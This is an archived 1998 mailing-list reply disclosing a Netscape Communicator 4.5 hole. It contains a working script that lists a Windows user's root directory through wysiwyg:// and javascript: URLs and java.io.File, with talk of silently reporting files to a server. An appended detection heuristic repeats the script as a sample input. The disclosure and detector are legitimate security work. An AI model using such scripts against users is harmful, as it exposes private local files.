Re: Netscape Communicator 4.5 can read local files

From: Terence Christopher Haddock (haddockat_private)
Date: Wed Nov 25 1998 - 12:28:45 PST


    This security hole is not limited to knowing a specific file name;
    it can be used to list the contents of a directory, which I believe is
    much more insidious. This script can send a list of the files in the
    user's root directory under Windows:
    
    sl=window.open("wysiwyg://1/file://C|/");
    sl2=sl.window.open();
    sl2.location="javascript:"+
    "b=\"Here is the files in your root directory:\";"+
    "var f=new java.io.file(\"C:\\\\\");"+
    "var files=f.list();"+
    "for (var x=0;x<files.length;x++){"+
    "b+=files[x]+\"\n\""+
    "};"+
    "alert(b);";
    
    (Simple to modify it for UNIX.)
    Using a search algorithm, the script could search for specific
    files by running this recursively. The only problem (from a hacker's
    perspective, a good thing from our perspective) is all of the windows it
    would open. If a way could be worked around this (which I think it can),
    this script could run without a user even knowing it, searching the user's
    directories and reporting them to a server.
    
    Sincerely,
    Terence C. Haddock
    
    On Wed, 25 Nov 1998, Ben Collins wrote:
    
    > Seems I was proven seriously wrong, *swallows pride*. The only limitations
    > I see are that you do have to know the file name and path, contrary to the
    > original post, and, as stated by the person who conducted the test, it is
    > platform specific (he had to change it to work on this Unix system). Not
    > trying to dilute the problem, just noting some things.
    >
    > Apologies for the error in my statements, but isn't it much nicer to see
    > it _really_ work?
    >
    > --
    > -----    -- - -------- --------- ----  -------  -----  - - ---   --------
    > Ben Collins <b.m.collinsat_private>                  Debian GNU/Linux
    > UnixGroup Admin - Jordan Systems Inc.                 bcollinsat_private
    > ------ -- ----- - - -------   ------- -- The Choice of the GNU Generation
    >
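
A content-filter heuristic for the pattern in the script above, as an added example that is not part of the original message: it flags page script that wraps a `file:` URL in `wysiwyg://`, reaches `java.io.File` through LiveConnect, or assigns a `javascript:` URL to a window's location. The rule ids, function names and both sample inputs are constructed for illustration.

```javascript
// Indicators taken from the script quoted in this thread. Rule ids are hypothetical.
const RULES = [
  { id: "wysiwyg-wraps-file-url", re: /wysiwyg:\/\/\d+\/file:/i },
  { id: "liveconnect-java-io-file", re: /\bjava\s*\.\s*io\s*\.\s*file\b/i },
  { id: "javascript-url-assigned-to-location", re: /\.location\s*=\s*["']javascript:/i },
];

// The posted script builds its javascript: URL from string literals joined
// with "+", so join adjacent literals and undo backslash escapes before matching.
function normalize(src) {
  return src
    .replace(/["']\s*\+\s*["']/g, "")   // "abc"+"def" -> "abcdef"
    .replace(/\\([\s\S])/g, "$1");      // \" -> "   \\ -> \
}

// Return the ids of every rule that matches the normalized script text.
function scan(src) {
  const text = normalize(src);
  return RULES.filter((rule) => rule.re.test(text)).map((rule) => rule.id);
}

// Constructed sample: shortened form of the script from the message.
const SAMPLE_FLAGGED = String.raw`
sl=window.open("wysiwyg://1/file://C|/");
sl2=sl.window.open();
sl2.location="javascript:"+
"var f=new java.io.file(\"C:\\\\\");"+
"var files=f.list();";
`;

// Constructed sample: ordinary pop-up code that should not be flagged.
const SAMPLE_BENIGN = String.raw`
w=window.open("http://www.example.com/help.html");
w.location="http://www.example.com/index.html";
`;

console.log("flagged:", scan(SAMPLE_FLAGGED));
console.log("benign: ", scan(SAMPLE_BENIGN));
```
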
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:24:15 PDT